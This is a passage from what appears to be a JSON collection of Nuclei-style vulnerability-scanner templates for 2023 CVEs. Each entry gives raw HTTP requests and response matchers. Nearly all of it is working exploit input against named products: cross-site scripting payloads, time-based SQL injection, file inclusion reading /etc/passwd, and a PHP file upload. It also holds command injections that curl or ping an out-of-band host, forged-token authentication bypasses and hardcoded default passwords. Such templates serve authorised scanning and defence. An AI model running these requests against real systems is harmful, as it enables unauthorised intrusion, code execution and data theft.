Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39110","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_1","words":["rConfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-37629","info":{"name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","severity":"critical"},"requests":[{"raw":["POST /pig/add-pig.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigno\"\n\npig-fms-100\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"weight\"\n\n65465\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"arrived\"\n\n{{date_time(\"%Y-%M-%D\")}}\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"gender\"\n\nfemale\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"status\"\n\nactive\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"breed\"\n\n2\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"remark\"\n\n4fwefwe\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigphoto\"; filename=\"{{rand_base(5)}}\".php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"submit\"\n\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(content_type, \"text/html\")","contains(body, \"successfully created\")"],"condition":"and"}]}]},{"id":"CVE-2023-38964","info":{"name":"Academy LMS 6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/courses?query=\"><svg+onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<svg onload=alert(document.domain)>\", \"All courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-4547","info":{"name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB","{{BaseURL}}/search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["100-1331\"><script>alert(document.cookie)</script>","><script>alert(document.cookie)</script>bvu51"],"condition":"or"},{"type":"word","part":"body","words":["<table class=\"products-nav\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29204","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me","{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-39677","info":{"name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1","{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2023-4974","info":{"name":"Academy LMS 6.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 500","contains(body, \"Courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-29357","info":{"name":"Microsoft SharePoint - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer\n","GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nAuthorization: Bearer {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\nX-PROOF_TOKEN: {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\n"],"extractors":[{"type":"regex","part":"header","group":1,"name":"realm","regex":["realm=\"([^\"]*)\""],"internal":true},{"type":"json","json":[".value[].Email"]}],"matchers":[{"type":"word","part":"body_2","words":["LoginName","Email","IsSiteAdmin"],"condition":"and"}]}]},{"id":"CVE-2023-32068","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-45136","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"data-xwiki-reference\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-5244","info":{"name":"Microweber < V.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"alert(document.domain)\", \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2023-22621","info":{"name":"Strapi Versions <=4.5.5 - SSTI to Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{email}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"token\",\"isActive\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"token","json":[".data.token"],"internal":true}]},{"raw":["PUT /users-permissions/advanced HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"unique_email\":true,\"allow_register\":true,\"email_confirmation\":true,\"email_reset_password\":null,\"email_confirmation_redirection\":\"{{RootURL}}\",\"default_role\":\"authenticated\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /users-permissions/email-templates HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\n  \"email-templates\": {\n    \"reset_password\": {\n      \"display\": \"Email.template.reset_password\",\n      \"icon\": \"sync\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Reset password\",\n        \"message\": \"<p>We heard that you lost your password. Sorry about that!</p>\\n\\n<p>But dont worry! You can use the following link to reset your password:</p>\\n<p><%= URL %>?code=<%= TOKEN %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    },\n    \"email_confirmation\": {\n      \"display\": \"Email.template.email_confirmation\",\n      \"icon\": \"check-square\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Account confirmation\",\n        \"message\": \"<%= `${ process.binding('spawn_sync').spawn({\\\"file\\\":\\\"/bin/sh\\\",\\\"args\\\":[\\\"/bin/sh\\\",\\\"-c\\\",\\\"curl {{interactsh-url}}\\\"],\\\"stdio\\\":[{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"},{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"/*<>%=*/}]}).output }` %>\\n\\n<p><%= URL %>?confirmation=<%= CODE %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    }\n  }\n}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["POST /api/auth/local/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"email\": \"{{address}}\",\n    \"username\": \"{{randstr_1}}\",\n    \"password\": \"{{randstr_2}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["ApplicationError"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-4220","info":{"name":"Chamilo LMS <= 1.11.24 - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3\n\n--------------------------SwxF5rRaZb4lETWlpulXn3\nContent-Disposition: form-data; name=\"bigUploadFile\"; filename=\"{{filename}}.txt\"\nContent-Type: application/octet-stream\n\n{{md5(num)}}\n\n--------------------------SwxF5rRaZb4lETWlpulXn3--\n","GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"{{md5(num)}}\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel < 11.109.9999.116 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror=\"prompt(document.domain)\">"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-41621","info":{"name":"Emlog Pro v2.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/store.php?\"onmouseover='alert(document.domain)'bad=\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["onmouseover='alert(document.domain)'bad=","emlog"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2059","info":{"name":"DedeCMS 5.7.87 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["dirname(__FILE__)","$cfg_basedir","dedecms"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2813","info":{"name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/"],"matchers-condition":"and","matchers":[{"type":"word","words":["<IMG SRC=/ onerror=\"alert(document.domain)\"></img>","wp-content/theme"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40208","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["stock_ticker","onmousemove=alert(document.domain)"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38501","info":{"name":"CopyParty v1.8.6 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<img src=copyparty onerror=alert(document.domain)>\",\"\\\">go to\")"],"condition":"and"}]}]},{"id":"CVE-2023-42442","info":{"name":"JumpServer > 3.6.4 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/terminal/sessions/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"terminal\":","\"user_id\":\"","\"account_id\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-5222","info":{"name":"Viessmann Vitogate 300 - Hardcoded Password","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-login\",\"params\":{\"uid\":\"{{username}}\",\"pwd\":\"{{password}}\"}}\n"],"attack":"pitchfork","payloads":{"username":["vitomaster","vitogate"],"password":["viessmann1917","viessmann"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["admin\":true","\"sessionId\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: CVE-2023-26469\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7cca0844e81cd333152def045fe075c2"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-4116","info":{"name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Passengers\", \"Drop-off address\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-4110","info":{"name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Booking\", \"Arrival\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-1880","info":{"name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"phpmyfaq\") && contains(body, \"<script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-22463","info":{"name":"KubePi JwtSigKey - Admin Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /kubepi/api/v1/users HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n\n{\n  \"authenticate\": {\n       \"password\": \"{{password}}\"\n  },\n  \"email\": \"{{email}}\",\n  \"isAdmin\": true,\n  \"mfa\": {\n          \"enable\": false\n   },\n  \"name\": \"{{name}}\",\n  \"nickName\": \"{{nickname}}\",\n  \"roles\": [\n  ]\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"password\":","\"isAdmin\":","\"createAt\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-27034","info":{"name":"Blind SQL injection vulnerability in Jms Blog","severity":"critical"},"requests":[{"raw":["@timeout: 12s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\nHost: {{Hostname}}\nConnection: Keep-alive\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n","GET /modules/jmsblog/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(body_2, \"Jms Blog\")"],"condition":"and"}]}]},{"id":"CVE-2023-3845","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-26035","info":{"name":"ZoneMinder Snapshots - Command Injection","severity":"critical"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrfMagicToken = \\\"(key:[a-f0-9]{40},\\d+)"],"internal":true}]},{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nview=snapshot&action=create&monitor_ids[0][Id]=;ping+{{interactsh-url}}&__csrf_magic={{csrf_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]}]}]},{"id":"CVE-2023-45855","info":{"name":"qdPM 9.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uploads/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /uploads</title>","attachments/</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45671","info":{"name":"Frigate < 